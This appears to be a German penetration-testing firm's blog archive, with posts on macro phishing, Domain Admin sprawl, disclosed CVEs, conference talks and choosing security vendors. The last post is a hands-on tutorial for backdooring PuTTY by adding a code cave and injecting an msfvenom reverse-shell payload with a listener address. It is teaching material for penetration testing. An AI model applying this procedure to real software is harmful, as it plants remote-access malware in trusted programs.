#2 Domain Admins überall

Der Angriff

Es ist ein Montagmorgen und Kevin Vielzutun beginnt seinen monatlichen Server-Check im Netzwerk, denn er ist einer von 3 Administratoren der Fahrlässig GmbH mit rund 100 Mitarbeitern. Um Zeit zu sparen und somit effizienter zu arbeiten führt Kevin diese Prüfungen wie üblich mit seinem Domain Admin Konto aus, andernfalls müsste er sich mit unterschiedlichen Accounts mehrfach anmelden.
Auf seinem Computer hat er jedoch von gestern noch soviele Remotedesktop-Fenster offen, sodass er nicht das richtige findet 🙁

Deshalb startet er eine neue Session auf seinem Server Ablage1, um festzustellen, dass hier bereits ein andere Domain Admin Account angemeldet ist. Dieses Problem tritt häufiger auf, da sein Kollege Otto Mirdochegal ebenfalls häufig vergisst seine Remote-Sessions zu beenden. Dies war bei den nächsten 3 weiteren Systemen auch der Fall, weshalb Kevin keine Lust mehr auf seine Server-Checks hatte und sich entschied zunächst etwas anderes zu tun.

Nun wollte sich Keven um das Ticket von Herrn Lustig kümmern, der vergangene Woche ein Problem mit Macros bei einem Excel Sheet der SuperSchnell GmbH hatte.

Während er versucht Herrn Lustig zu erreichen, fragt er sich noch, warum Otto auf seinem Server mit dem uralten ITADMIN (Domain Admin) Konto angemeldet ist. Denn Otto ist im Urlaub, war noch nie auf diesem Server und den Account ITADMIN kannte er nicht… Naja, das kann Kevin fragen, wenn Otto nächste Woche aus dem Urlaub kommt…

Was ist passiert?

Nachdem Herr Lustig vergangene das Macro auf seinem Computer ausgeführt hat, hatte ein Angreifer die Kontrolle über sein System erlangt. Anschließend hat sich dieser im Netzwerk umgesehen, um seine Rechte im Netzwerk zu maximieren. Hier war sehr schnell ersichtlich, dass trotz der kleinen Unternehmensgröße zahlreiche Domain Admin Accounts existierten und diese auf „normalen“ Clients & Servern angemeldet waren.

Bei der Auswertung wurde deutlich, dass die 3 Admins im Haus, ca. 20 Accounts mit Domain Admin-Rechten angelegt haben und mit diesen auf fast der Hälfte der Systeme im Unternehmen sich nicht abgemeldet haben. Nun hatte der Angreifer eine Auswahl von über 50 Systemen, wo er sich das verwundbarste aussuchen konnte, um dieses zu kompromittieren und anschließend die Session des Domain Admins zu übernehmen.

Die Gegenmaßnahme

Grundsätzlich gibt es hier zwei Möglichkeiten dem Angreifer deutlich mehr abzuverlangen und sich besser zu schützen:

Domain Admins nur auf Domain Controller

Diese beide Begriffe/ AD-Objekte klingen nicht nur ähnlich, sondern sind auch gleich wichtig für jedes Netzwerk mit einer Windows Domain. Die Domain Administratoren dürfen sich niemals auf andere Server oder gar auf Clients verbinden, da diese in der Regel deutlich schneller kompromittiert werden können als ein Domain Controller.

Anzahl Domain Admins

Es sollten nicht mehr als 2-3 Domain Admins in einem Netzwerk existieren und diese sollten ausschließlich für Tätigkeiten auf dem Domain Controller vorgesehen werden (z.B. GPO konfiguieren).
Für alle anderen Tätigkeiten (Support, Software-Installation, Serverkonfiguration, Virenscanner oder Incident Response xD …) sollten dedizierte Gruppen angelegt werden, welche nur für die spezifischen Aufgaben genutzt werden kann.

Sicherheitsgewinn

Hoch

*Aus der Blog-Serie Top Security QuickFails

#1 Standard Office Macros Einstellungen

Der Angriff

Unser Mitarbeiter des Monats Peter Lustig erhält eine E-Mail seines Lieferanten SuperSchnell GmbH, welcher eine korregierte Bestellung in einem Excel Sheet angehangen hat.
Natürlich wurde das Excel Sheet mit einem Passwort geschützt, da ja die Datenschutz Grundverordnung alles andere strikt untersagt xD

Herr Lustig öffnet also seinen E-Mail Anhang und sieht folgende Meldung in seinem Excel Programm:

Selbstverständlich aktiviert Herr Lustig die Inhalte, da Herr Immerböser von der SuperSchnell GmbH bereits in der E-Mail darauf hingewiesen hat, dass dies für den Passwort-Schutz notwendig sei. Das Ergebnis sieht dann wie folgt aus:

Was ist passiert?

Das Macro hat eine Datei „poc_HanseSecure.exe“ aus dem Internet heruntergeladen, auf dem Desktop gespeichert (siehe oben Links) und ausgeführt. Das Programm macht an dieser Stelle nichts anderes, als eine MessageBox anzuzeigen. Ein echter Angreifer hätte weder das erste Powershell-Fenster anzeigen lassen, noch eine Messagebox als Payload verwendet. Stattdessen hätte dieser entweder alle beschreibbaren Dateien (auch auf Servern) verschlüsselt oder heimlich ein Backdoor installiert, um perfidere Angriffe durchzuführen.

Die Gegenmaßnahme

Es gibt zwei wesentliche Möglichkeiten diese Art von Angriffen (die 85% der perfideren Phishing-Angriffe ausmachen…) zu verhindern:

Macros Deaktivieren

Wenn im Unternehmen keine Macros genutzt werden, kann man sehr gerne dieses Tor zur Hölle einfach schließen und Macros grundsätzlich deaktivieren 😉
Falls nur spezifische Nutzergruppen Macros benötigen (zum Beispiel Vertrieb & Marketing, wer sonst xD), könnte man auch über eine GPO nachdenken, welche diese Benutzergruppe von der Deaktivierung ausschließt.

Macros Siginieren

Die Lösung mit deutlich mehr Aufwand, welche aber die Nutzung von Macros weiterhin flächendeckend ermöglicht, ist das Macro Signing.
Hierbei wird ebenfalls über GPOs konfiguiert, dass nur noch Macros ausgeführt werden können, welche entsprechend Signiert worden sind. Ein Beispiel, wie man Macros signieren könnte, hat Microsoft in einigen Beiträgen zusammengefasst.

Sicherheitsgewinn

Sehr hoch

*Aus der Blog-Serie Top Security QuickFails

Die Vorgeschichte

Wir haben in den letzten Jahren extrem viele Penetrationstests bei Unternehmen jeglicher Größe und Branche durchgeführt (von der kleinen Anwaltskanzlei mit 3 Angestellten, über Kraftwerke bis hin zu Banken und Versicherungen mit mehreren tausend Mitarbeitern). Diese Blog-Serie zeigt eine Auswahl von Angriffsvektoren auf, von denen mindestens einer nahezu immer zur Kompromittierung der gesamten Domain führte oder zumindest die Informationssicherheit des Unternehmens stark gefährdete.

Hinweis: Die Liste ist keineswegs abschließend, weshalb dieser Serie ständig (wir versuchen es 🙂 ergängzt wird.

Die QuickFails

• #1 Office Macros
• #2 Domain Admins überall

Als ich vor einiger Zeit als Speaker für eine ’spezielle‘ Konferenz angefragt worden bin, dachte ich zunächst an Fake/Spam/Scam oder sonstiges.

Der Titel und Umfang der Veranstaltung klang völlig absurd, weshalb ich mich zunächst in meinem Netzwerk ungehört habe, um festzustellen, dass es sich hierbei um keinen Fake handelt…

Somit habe ich dem Veranstalter zugesagt und erhielt kurze Zeit später erhielt die offizielle Einladung als

Keynote Speaker bei Best of the World in Security mit einem Zuschauerkreis von 15.000+ (Erfahrungswert der vergangenen Jahre)…

Spätestens jetzt wird der eine oder andere Leser verstehen, warum ich meine Zweifel hatte.
Dazu kommen die übrigen Keynotes von einem Security Cloud Architekten bei Google, dem Vize Präsidenten von IBM Security oder dem Chef Researcher von Mcafee. Und mittendrin & als erster Deutscher, der Flo xD

Nachdem ich sich meine Aufregung wenigstens ein bisschen gelegt hatte, habe ich beim Veranstalter gefragt, wie ich in diesen LineUp gerutscht bin und seine Antwort hat mich dann erneut sehr überrascht. Die Veranstaltung hat keine Sponsoren, sondern alle Speaker werden nominiert und von einer Jury ausgewählt 🙂

Ich freue mich sehr auf die Veranstaltung, auch wenn ich unglaublichen Respekt vor dem LineUp habe!

So oder so werde ich hier und auf Twitter berichten 😉

Update vom 20.06.2021

Vielen Dank, dass ich dabei sein durfte!

Wir freuen uns seit dem 26.04.2021 die Kollegen von der „Corporate Trust Business Risk & Crisis Management GmbH“ als unseren ersten technischen Partner vorzustellen:

I am very happy to introduce our very first technical cooperation partner:@CorporateTrust

They will support us in the area of incident response, forensic and risk management so that we can keep our focus on offensive Security.#infosec #blueteam #redteam pic.twitter.com/31eF5UBrrh

— Florian Hansemann (@CyberWarship) April 26, 2021

Hier eine kurze Darstellung unserer neuen Kollegen:

Corporate Trust

Die Corporate Trust ist Ihr strategischer Partner im Risiko- und Krisenmanagement. Als Unternehmensberatung für Sicherheitsdienstleistungen unterstützen wir Unternehmen, Organisationen und Privatpersonen im High-Level-Security-Bereich

Sicherheitskonzepte sollten so effektiv und diskret sein, dass Sie ihre Existenz am besten gar nicht wahrnehmen. Genau das ist unsere Mission: Wir wollen eine Umgebung schaffen, in der Sie sich absolut sicher und ungestört auf Ihre Ziele und die Ziele Ihres Unternehmens konzentrieren können. Im Mittelpunkt steht dabei immer der Mensch.

Leistungen Corporate Trust

• Digital Forensics & Incident Response
  Das wo wir Deine Leistungen am Besten ergänzen können ist sicherlich unser DFIR Leistungsspektrum. Unser Angebot: tiefgehende forensische Untersuchungen sowohl im Netzwerk als auch host-based, Projektleitung oder Beratung zur möglichst schnellen Wiederherstellung des Business in einer sicheren Umgebung und eine professionelle Verhandlung mit Erpressern soweit ein erfahrenes Krisenkommunikationsteam.
  
• Klassische Sicherheit
  Im Speziellen die Angebote unserer Kollegen aus der klassischen Sicherheit können bei Deinen Kunden sicherlich auch interessant sein: Geldrückholungen bei Business Email Compromise (Fake President, Payment oder Goods Diversion), Background Checks von Geschäftspartnern oder Verflechtungsanalysen von verdächtigen Personen.
  

Zusammen mit unseren spezialisierten Fähigkeiten im Bereich Offensive Security & Security Research decken wir nun alle Gebiete im Bereich Security & IT-Security ab!

Wir freuen uns auf eine tolle Zusammenarbeit und spannende gemeinsame Projekte!

Gute Digitalisierung. Böse Digitalisierung.

Nachdem ich vor mittlerweile 4 Jahren meinen letzten Vortrag bei einer GoBusiness Veranstaltung gehalten habe, freue ich mich sehr, dass ich erneut eingeladen worden bin.

Dieses mal gibt es zwar keinen Live-Hack, aber die Inhalte sind umso spannender 😉
Falls Jemand noch Zeit & Lust hat, am 29.04.2021 dabei zu sein: Hier gehts zur kostenfreien Anmeldung.

Die Slides gibt es hier wie üblich anschließend zum Download.

Noch mehr Infosec gibt es bei meinem Twitter Account 😉

Ich freue mich sehr am 07.05.2021 bei der Webkonferenz für IT-Sicherheitsmanagement in Versicherungen einen Vortrag halten zu dürfen.

Der Teilnehmerkreis besteht aus namenhaften Versicherungen und ich bin auf anregende Disskussionen gespannt.

Wie üblich werde ich diesen Beitrag anschließend mit meinen Slides ergänzen.

Here we go 😉

Am 10.02.2021 durfte ich eine KeyNote auf der Security Konferenz ISX des Vogel IT Verlages halten. Der Verlag hat einige coole Formate, welche der eine oder andere kennen könnte. Zum Beispiel gehören Security Insider und IT Business dazu 😉

Worum ging es?

Ich habe (in den doch sehr kurzen 15 Minuten 🙂 im Vortrag drei Gliederungspunkte erläutert

QuickFails

Aufzeigen von typischen Fehlern in Unternehmen, welche in meinen Penetrationstests häufig zu schwerwiegenden Sicherheitsproblemen führen -> und mögliche Gegenmaßnahmen 😉 – 3:50

Unglaublich aber wahr

Praxiserfahrungen eines Pentester. – 10:30

Warum ist „Cybern“ so schwer?

Ein Versuch den richtigen Weg für mehr Informationssicherheit aufzuzeigen. – 14:56

Video und Slides

Die genutzte digitale Plattform war überragend und ich hatte extrem viel Spaß bei der Veranstaltung. Vielen Dank an das gesamte Orga-Team!

Ich versuche regelmäßig technische Trainings zu absolvieren, um neuen Input für meine Arbeit zu erhalten.
Daher habe ich in den vergangenen Monaten weitere Trainings absolviert und entsprechend Zertifizierungen erworben:

• Hands on Hacking by HackerHouse (Link)
• Certified Red Team Expert by PentesterAcademy (Link)
• Adversary Tactics: Red Team Operations by SpecterOps (Link)

• 

• 

• 

Ich versuche zu jedem Training ein Review zu schreiben, weiß jedoch noch nicht wann 😉

Ich durfte am 21.09.2020 einen Vortrag bei der Trust in Tech Cologne halten. Die Veranstaltung hat mir extrem viel Spaß gemacht und es war eine super offene Runde, vielen Dank dafür!

Hier geht es zu den Slides zum Thema „Der Letzte macht die Tür zu – Unverschlossene Büros als Einladung für Hacker„

Ich hatte sehr viel Spaß bei einer Jubiläumsausgabe des Podcasts „Einsen & Nullen, IT einfach erklärt“ bei Tech Data. Wir haben über unterschiedliche technische Prüfungsmöglichkeiten des Sicherheitsniveaus in Unternehmen gesprochen. Wer mag kann gerne reinhören 😉

Cyberscoring

CVE

CVE-2020-13912

Verwundbare Software

SolarWinds „Advanced Monitoring Agent“ vor 10.8.9

Schwachstelle

Unzureichende Berechtigung/ Rechte Erweiterung

Zeitlinie

• 18.05.2020 Hersteller informiert
• 20.05.2020 Hersteller bestätigt die Schwachstelle und teiltHanseSecure mit, dass die Schwachstelle in Version 10.8.9 gepachted wurde.
• 03.06.2020 Disclosure

Beschreibung

Die Software Advanced Monitoring Agent bis zur Version 10.8.9 wurde beim Anmelden jedes Nutzers (remote oder local) ausgeführt. Die entsprechende Datei ist von allen Benutzern auf dem System veränderbar. Ein böswilliger Nutzer könnte die Datei mit einer modifizierten Version austauschen, um beliebige Befehle im Kontext des anmeldenden Nutzers auszuführen.

Referenzen:

• CWE CATEGORY: Permission Issues
• Acknowledgement

Ich habe in den vergangenen Wochen einige Webinare und Unterlagen erstellt, welche Firmen und ggf. auch der einen oder anderen Privatperson helfen können, sich im HomeOffice abzusichern. Je nachdem wie viel Zeit man nun hierfür aufbringen kann/ will, muss man lediglich den richtigen Absatz auswählen 😉

Für die, ohne Zeit

QuickWins: Einfache Maßnahmen mit großer Wirkung
(Ich werde die PDF-Version noch nachliefern)

Erste Veröffentlichung am 08.05.2020 auf LinkedIn

Für die, mit etwas mehr Zeit

Slides meines Webinars „IT-Sicherheit im HomeOffice“ bei der IHK München
Zunächst gibt es eine kurze Einleitung zum Thema HomeOffice, bzw. zeige ich die wesentliche Unterschiede im Hinblick zur Security Maßnahmen auf.
Danach gehe ich auf die typischen Angriffsvektoren auf Nutzer im HomeOffice ein. Anschließend skizziere ich die möglichen Auswirkungen eines kompromittierten Clients in Ihrem Netzwerk. Am Schluss zeige ich dann verschiedene Möglichkeiten es dem Angreifer etwas schwerer zu machen 😉

Erste Veröffentlichung bei der IHK München am 06.05.2020 (nach Hansemann suchen 😉

Für die, mit viel Zeit

Aufzeichnung meines Webinars „IT-Sicherheit im HomeOffice“ bei der IHK München.

Timeline:

• 00:00 – 06:00 Begrüßung
• 06:00 – 09:00 Informationen zu meiner Person
• 09:00 – 11:00 Allgemeine Einführung
• 11:00 – 17:30 Welche Schutzmechanismen muss ein Angreifer im „idealen“ Firmennetzwerk überwinden
• 17:30 – 19:30 Welche Schutzmechanismen muss ein Angreifer im HomeOffice überwinden
• 19:30 – 21:00 Welche Schutzmechanismen muss ein Angreifer im HomeOffice mit privater IT überwinden
• 21:00 – 30:45 Fragen aus dem Plenum
• 30:45 – 34:45 Wie werden Nutzer im HomeOffice angegriffen?
• 34:45 – 37:00 Auswirkungen eines kompromittierten Computers
• 37:00 – 52:00 Einfache Maßnahme mit großer Wirkung für mehr IT-Sicherheit
• 52:00 – 54:10 Idee zum Schutz privater IT (wenn es nicht anders geht)
• 54:10 – 54:18 Übersicht aller Maßnahmen
• 54:18 – 72:00 Fragen aus dem Plenum
• 72:00 – * Ende

Abschluss

Viel Spaß beim Lesen/ Schauen und Einrichten 😉
Fragen und Kritik gerne via Twitter oder Email.

PS:
Wem es gefallen/ geholfen hat, kann mir gerne eine Rezession auf Google hinterlassen.

Die Anzahl der Cyberangriffe, die damit einhergehenden Schäden und die Professionalität der Täter nimmt immer weiter zu. Daher wächst derzeit der Security Markt stärker, als jeder andere. Dennoch oder gerade deshalb tauchen viele Anbieter auf dem Markt auf, die in der Security nichts zu suchen haben. Wie erkennen Sie einen guten Security Dienstleister?

Es gibt zahlreiche Anbieter im Bereich des Security Consultings. Diese können alles, haben lange Listen starker Referenzkunden und sind seit Jahrzehnten am Markt präsent. Die Bewertung und Unterscheidung der Qualität der Arbeit ist dennoch sehr häufig ein Problem, insbesondere für fachfremdes Personal. Selbst die derzeit eingesetzten Administratoren, Netzwerkarchitekten und/ oder IT-Leiter besitzen in der Regel nicht die tiefgreifenden Security-Fachkenntnisse, um zwischen den verschiedenen Security-Dienstleistern abzuwägen oder sogar ein Fachinterview zu führen.

Was tun?

Es gibt unterschiedlichste Kriterien, welche ich Ihnen empfehlen würde, um die Kompetenzen eines Security Dienstleisters zu bewerten. Grundsätzlich gibt es vier Anhaltspunkte, welche Ihnen die Möglichkeit bieten, die Fachkompetenz des potentiellen Dienstleister zu bewerten:

1. Veröffentlichung von Schwachstellen und/ oder Security Tools

Sofern der potentielle Dienstleister spezifische Kompetenzen im Bereich der technischen Security besitzt, hat dieser in der Regel ein Interesse daran seine Reputation in der Security Community zu erhöhen oder allgemein idealistisch die Informationssicherheit aller Systeme zu erhöhen. Hierfür gibt es zwei weit verbreitete und anerkannte Möglichkeiten: Die Veröffentlichung von Sicherheitslücken oder Tools zur Erhöhung der Security eines Systems.

Dienstleiter können bisher unbekannte Schwachstellen detektieren und veröffentlichen (in der Regel nach der Information an den Hersteller) und hierfür sogenannte CVEs beantragen. Dies steht für Common Vulnerabilities and Exposures, einem Industriestandard für Schwachstellen. Der Dienstleister erhält diese, wenn er eine valide Sicherheitslücke an die MITRE Coporation übermittelt, ein amerikanisches Forschungsunternehmen, das für verschiedene Bundesbehörden, Gerichte und Bundesministerien in den USA tätig ist. Sofern der Antrag valide ist, wird eine einzigartige CVE-ID generiert, welche die Schwachstellen öffentlich eindeutig katalogisiert und bewertet.

Kann Ihr potentieller Anbieter CVEs/ Schwachstellen vorweisen und sind diese sogar in einer weit verbreiteten Software im Einsatz?

Während der Bearbeitung spannender Projekte wird man als Dienstleister häufig vor Probleme gestellt, für die es noch keine automatisierte oder zumindest teil-automatisierte Lösung gibt. Daher entwickeln Dienstleister häufig kleine Tools/ Scripte, um gewisse Aufgaben zu erleichtern. Häufig werden diese dann über github oder gitlab der Community (in abgeschwächter Form) zur Verfügung gestellt. Dies hat neben den oben genannten Zielen noch einen weiteren Vorteil,: Die Open-Source-Projekte können von der gesamten Community (sofern ein tatsächlich Mehrwert generiert wird) weiterentwickelt werden.

Entwickelt der potentielle Dienstleister Tools zur Optimierung der Security für die Community und werden diese sogar gut bewertet?

2. Blogs der Anbieter

Hier kann von Fachbeiträgen zu aktuellen Security-Themen, über Anleitungen für Hacking bis hin zu der Entwicklung oder Verschleierung von Malware alles Mögliche festgehalten sein. Manchmal kann man anhand der Blogbeiträge einen Rückschluss auf die Tätigkeiten aus vergangenen Projekten schließen.
Wenn beispielsweise ein Blogbeitrag das Injizieren einer Malware in eine gängige Software beschreibt, ist es denkbar, dass der Dienstleister genau dies für einen Penetrationstest bei seinem Kunden genutzt hat.

Lesen Sie einige Beiträge des potentiellen Dienstleisters, um eine Idee für dessen technischen Fähigkeiten zu erlangen. Beschreibt der Blog  ausschließlich aktuelle Themen der Security oder widmet sich ihnen auf sehr strategischer und management-lastiger Ebene, ist der Dienstleister gegebenenfalls mehr für konzeptionelle Aufträge als für technische Sicherheitsanalysen geeignet.

3. Social Media

Der Community-Gedanke war im Bereich Security schon immer von sehr hoher Bedeutung. Waren es früher IRC Chaträume in denen man sein Wissen ausgetauscht hat, wird heute vorrangig Twitter genutzt.
Twitter ist in der Security Welt mit Abstand das beste Medium um auf dem aktuellsten Stand zu bleiben (Malware, Angriffsvektoren, Security Tools, Exploit Code, 0Days, etc.).
Anhand der Anzahl der Follower können auch Nicht-Security-Personen relativ schnell erkennen, ob der potentielle Dienstleister oder Consultant einen Mehrwert für die Community liefert. Hierbei sollte man jedoch zusätzlich auf die Reaktionen der Tweets achten (Likes, Retweets), um auszuschließen, dass Follower gekauft worden sind. Hat beispielsweise ein Account 10.000 Follower, jedoch lediglich zwei bis drei Likes pro Tweet, ist dies äußerst verdächtigt.

Schauen Sie sich die Social-Media-Accounts (insbesondere Twitter) an, um abzuschätzen, ob und welchen Stellenwert der potentielle Dienstleister in der Community einnimmt.

4. Beiträge auf Security-Konferenzen

Es gibt zahlreiche hochkarätige Konferenzen, bei denen Security Consultants als Referent teilnehmen. Nachfolgend ein Auszug der anerkanntesten Konferenzen in der technischen Security Community:

• Offensive Con (Berlin): https://www.offensivecon.org/
• Troopers (Heidelberg): https://www.troopers.de/
• CCC Konferenz (Leizip): https://www.ccc.de/
• BlackHat (weltweit): https://www.blackhat.com/
• ruhrsec (Bochum): https://www.ruhrsec.de/

Wenn Ihr potentieller Dienstleister auf den obigen Konferenzen als Referent tätig war, können Sie davon ausgehen, dass er auf einem sehr hohem Niveau arbeitet.

Es ist etwas lustig, dass zwei unabhängige Unternehmen jeweils die „21“ Cybersecurity und Redteaming Quellen weltweit benannt haben. Aber ich bin sehr stolz, dass ich auf beiden Listen benannt worden bin 😉

Eins ist der amerikanische Blog namens Techbeacon und das andere ist der amerikanische Endpointprotection Hersteller SentinelOne.

2018 – Techbeacon: Modern red teaming: 21 resources for your security team

https://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team

2019 – SentinelOne: 21 CYBERSECURITY TWITTER ACCOUNTS YOU SHOULD BE FOLLOWING

https://www.sentinelone.com/blog/21-cybersecurity-twitter-accounts-you-should-follow/

CVE

CVE-2019-12763

Verwundbare Software

Android App: Security Camera CZ

Schwachstelle

Unsichere Dateispeicher (M2, OWASP Mobile Top 10, 2016)

Zeitlinie

• 28.05.2019 Hersteller informiert
• 29.05.2019 Hersteller versucht die Schwachstelle zum nächsten Release zu fixen
• 29.05.2019 Veröffentlichung

Beschreibung

Die Applikation Security Camera CZ bis zur Version 1.6.8 speichert Bilder des aufgezeichneten Videos auf dem externen Speicher. Diese Bilder können sehr sensible Daten enthalten, da diese häufig als Baby-WebCam genutzt wird. Der externe Speicher ist schreib- und lesbar durch jede andere App auf dem Gerät. Dies kann zur Offenlegung sehr sensibler Daten durch eine schadhafte App führen.

Referenzen:

• OWASP Mobile Top 10 (2016)
• OWASP The Mobile Security Testing Guide, External Data Storage

Während meines letzten Assessments habe ich ein merkwürdiges Verhalten bei Microsoft’s SmartScreen Feature festgestellt.
Grundsätzlich sollte dieses Security Feature das Ausführen von nicht vertrauenswürdigen Dateien aus dem Internet blocken (mehr Informationen).

Tatsächlich wird die Ausführung von nicht vertrauenswürdigen Applikationen geblockt, wenn man versucht diese über die GUI zu öffnen(file explorer).

Jedoch wird die Ausführung beim Öffnen der Applikation über ein Command Line Tool wie cmd oder powershell nicht geblockt xD

Ich habe über dieses Verhalten bereits getwittert und  Matt hatte eine logische Antwort für dieses Verhalten.

Trotzdem finde ich dieses Verhalten lustig und denke, dass die meisten Admins dies nicht kennen. Deshalb habe ich entshcieden diesen kurzen Post zu verfassen.

Beschreibung

Von Applikation, welche in den Hintergrund versetzt werden, werden Screenshots zur besseren Userexperience angelegt. Unglücklicherweise können andere Apps auf diese zugreifen und damit sensible Daten wie Banking Informationen, Passwörter oder persönliche Informationen offenlegen.

Beispiel

Alle Applikationen im Hintergrund können betrachtet werden (Screenhots).

Gegenmaßnahmen

Nutze das FLAG_SECURE zum verstecken des Bildschirm, wenn eine App in den Hingerund versetzt wird. Dadurch wird lediglich ein schwarzer Platzhalter angezeigt.

Referenzen

OWASP-MSTG Android Reference

OWASP-MSTG iOS Reference

Willkommen zu meinem nächsten Blogpost. Heute möchte ich euch ein paar grundlegende Pentesting Tätigkeiten zeigen. Wir werden händisch eine PE-Datei mit einem Backdoor versehen, wobei hier die Software PuTTY als Beispiel nutzen werde.

Ich habe folgendes Setup verwendet:

• Windows 10 Pro 32 Bit
• Putty
• Stud_PE
• Immunity Debugger

Bevor wir tief im Assembly Code rumbasteln, möchte ich kurz erläutern, was wir überhaupt vor haben.

Wir fügen eine neue Header Section mit dem Namen .evil zu unserer Datei hinzu und hijscken den Programmablauf der Datei. Am Entry Point werden wir den Programmablauf zu unserem Shellcode umleiten und nachdem wir unsere Shell erlangt haben, das Programm wie gewohnt ausführen lassen (PuTTY startet).

 

#0x01 Section hinzufügen

Als erstes fügen wir mit Hilfe von Stud_PE unsere neue Section .evil zur Datei hinzu. Die nachfolgenden Bilder sind ziemlich selbsterklärend 😉

Ich habe für die Section eine Größe von 1500 Bytes gewählt, welche mit Nullbytes gefüllt wird. Dieser Platz ist mehr als ausreichend für unseren Shellcode.

Nach dem Speichern der Datei und Laden im Immunity Debugger können wir den Unterschied der beiden Dateien deutlich erkennen (.evil Section erscheint).

Und wenn wir die Werte der .evil Section betrachten, sehen wir das folgende (unsere vordefinierten Nullbytes 😉 -> Top!

 

00FB0000 <-> 00250000

Während ihr unsere neue Section betrachtet, ist euch ggf. Aufgefallen, dass sich die Adressen leicht verändert haben. Die letzten 4 Bytes sind Nullbytes, aber die ersten 4 haben sich durch das Neuladen der Datei verändert.

Das ist ein Kernelschutz namens ASLR, du kannst hier mehr Informationen darüber finden. Dies macht uns etwas Mehrarbeit, ist aber kein wirklich Problem (später mehr dazu ;-).

 

#0x02 Hijack Programmablauf

Jetzt schauen wir uns den Entry Point unserer Datei im Immunity Debugger an. Die erste Instruktion ist ein call bei 0x002B7FD6. Wir werden dies in einen Jump zu unserem Shellcode ändern. Aber bevor wir Änderungen vornehmen, kopieren wir die „alten“ Instruktionen im eine Textdatei, weil wir nach unserer Shellcode Ausführung zurück zum Programmablauf springen möchten.

Markiert die erste Instruktion und schreibt „jmp [adress of .evil]“. Bei mir wäre dies beispielsweise „jmp 0x002E3000“. Danach druckt ihr Enter und seht das folgende:

Speichert die Änderungen in eine neue Datei und lädt diese neu.

 

Nun führen wir die erste Instruktion mir F7 aus und werden in unserer Code Cave .evil gefüllt mit Nullbytes landen.

Für unsere Zwecke werden wie die Nullbytes mit Nops ersetzen. Hierfür muss man lediglich alle Nullbytes der Code Cave markieren und das folgende tun:

Wir speichern diesen Status der Register auf unserem Stack mit den assembly Instruktionen pushad && pushfd.

Am Ende der Code Cave stellen wir diesen Status mit den Instruktionen popfd uns popad wieder her.

So weit, so gut (hoffentlich ;-). Nun müssen wir etwas rechnen, um ASLR zu umgehen.
Unser Ziel ist es, alle überschriebenen Funktionen wieder herzustellen und am Ende unseres Payloads dorthin zu springen, um in den „alten“ Programmablauf zu gelangen. Wenn wir uns den Entry Point ansehen, stellen wir fest, dass lediglich die call Funktion fehlt. Ohne ASLR könnten wir an dieser Stelle einfach die alte Adresse aus unserer Textdatei nutzen und dorthin springen. Damit wäre dies ein simples „call 0x002B8265„, aber wie wir sehen im hat sich auch das „jmp 0x002B7E6E“ verändert, …. ASLR Hurra! xD
Also was nun? Wir müssen das Offset zwischen der alten und neuen Adresse berechnen. Anstatt das alles auf 4 Seiten zu verschriftlichen, habe ich versucht das ganze nachfolgend in Bilder zu erklären. (Falls es hier Fragen gibt, am besten mich über Twitter kontaktieren 🙂

Am Ende haben wir unsere „neue“ Adresse für unsere überschrieben call Instruktion berechnet: 0x13F8265.
Wir platzieren diese nun direkt hinter unseren wiederhergestellten Registern (pushfd, pushad).
Dann brauchen wir nur noch in unsere nächste ursprüngliche Instruktion am Entry Point zu springen „jmp 0x01067FD8“ und das Programm läuft wie gewohnt.

#0x03 Inject Shellcode

Wählt eine Methode, um euren Shellcode zu erzeugen. Ich nutze an dieser Stelle einfach msfvenom mit folgender Syntax:

 

msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex

Anschließend könnt ihr die Binary Paste Funktion in Immunity nutzen, um den Shellcode in die Code Cave einzufügen.

Save the file and voila, you sucessfully backdoored a PE-File !

Ok, just one thing is missing. The shellcode of msfvenom used the WaitForSingleObject function and the default values prevent the application to execute until the shell is released.

To solve this change the „DEC ESI“ code at the end of the shellcode with a nop.

 

0x04 PoC

Start your listener and fire up the application.

Thanks for reading and if you like this post, check my twitter account please! xD